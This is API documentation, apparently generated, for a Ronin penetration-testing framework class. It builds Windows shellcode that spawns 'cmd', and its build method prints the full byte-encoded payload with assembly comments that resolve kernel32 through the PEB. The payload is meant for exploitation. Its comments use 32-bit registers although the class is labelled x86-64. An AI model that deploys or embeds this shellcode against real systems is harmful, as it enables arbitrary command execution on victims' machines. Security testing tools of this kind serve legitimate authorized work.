Class: Ronin::Payloads::Shellcode::Windows::X86_64::CMD

Inherits:
ExecShellPayload show all
Defined in:
lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb

Overview

Windows x86-64 shellcode that executes "cmd".

Instance Attribute Summary

Attributes inherited from Payload

#encoders, #payload

Instance Method Summary collapse

Methods inherited from Ronin::Payloads::ShellcodePayload

payload_type, #shellcode

Methods inherited from ASMPayload

#assemble, assembler, payload_type

Methods included from Metadata::OS

included, #os, #os_version

Methods included from Metadata::Arch

#arch, included

Methods inherited from BinaryPayload

payload_type

Methods inherited from Payload

#built?, #built_payload, #bytesize, #cleanup, #encode_payload, #encoded_payload, encoder_class, #initialize, #length, payload_type, #perform_build, #perform_cleanup, #perform_postlaunch, #perform_prelaunch, #perform_validate, #postlaunch, #prelaunch, #rebuild_payload, #reencode_payload, register, #to_s, #validate

Constructor Details

This class inherits a constructor from Ronin::Payloads::Payload

Instance Method Details

#buildObject

Builds the shellcode.



55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
 
# File 'lib/ronin/payloads/builtin/shellcode/windows/x86_64/cmd.rb', line 55

def build
  @payload = "\x31\xC9" +                 # xor ecx,ecx
             "\x64\x8B\x71\x30" +         # mov esi,[fs:ecx+0x30]
             "\x8B\x76\x0C" +             # mov esi,[esi+0xc]
             "\x8B\x76\x1C" +             # mov esi,[esi+0x1c]
             "\x8B\x36" +                 # mov esi,[esi]
             "\x8B\x06" +                 # mov eax,[esi]
             "\x8B\x68\x08" +             # mov ebp,[eax+0x8]
             "\xEB\x20" +                 # jmp short 0x35
             "\x5B" +                     # pop ebx
             "\x53" +                     # push ebx
             "\x55" +                     # push ebp
             "\x5B" +                     # pop ebx
             "\x81\xEB\x11\x11\x11\x11" + # sub ebx,0x11111111
             "\x81\xC3\xDA\x3F\x1A\x11" + # add ebx,0x111a3fda (for seven X86 add ebx,0x1119f7a6)
             "\xFF\xD3" +                 # call ebx
             "\x81\xC3\x11\x11\x11\x11" + # add ebx,0x11111111
             "\x81\xEB\x8C\xCC\x18\x11" + # sub ebx,0x1118cc8c (for seven X86 sub ebx,0x1114ccd7)
             "\xFF\xD3" +                 # call ebx
             "\xE8\xDB\xFF\xFF\xFF" +     # call dword 0x15
             "\x63\x6d\x64"               # db "cmd"
end